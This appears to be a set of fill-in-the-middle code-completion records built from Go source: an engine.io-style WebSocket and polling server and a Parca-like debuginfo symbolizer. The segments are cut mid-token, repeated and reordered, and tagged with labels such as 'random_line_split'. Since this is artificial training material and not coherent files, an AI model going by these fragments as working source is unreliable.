glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
c.Close()
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up, here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
r | emoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// | identifier_body |
|
server.go | ReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake. | // options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
c.Close()
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up, here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request | CookieName string
}
// NewServer allocates and returns a new server with the given | random_line_split |
server.go | by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
c.Close()
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up, here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
remoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// handshakeData returns the JSON encoded data needed
// for the initial connection handshake.
func hand | shakeData(c * | identifier_name |
|
symbolizer.go | liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes it the
// given location.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempt to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) | countLocationsToSymbolize | identifier_name |
|
symbolizer.go | : line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes it the
// given location.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempt to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found {
locationsToSymbolize++
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil { | random_line_split |
||
symbolizer.go | }
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
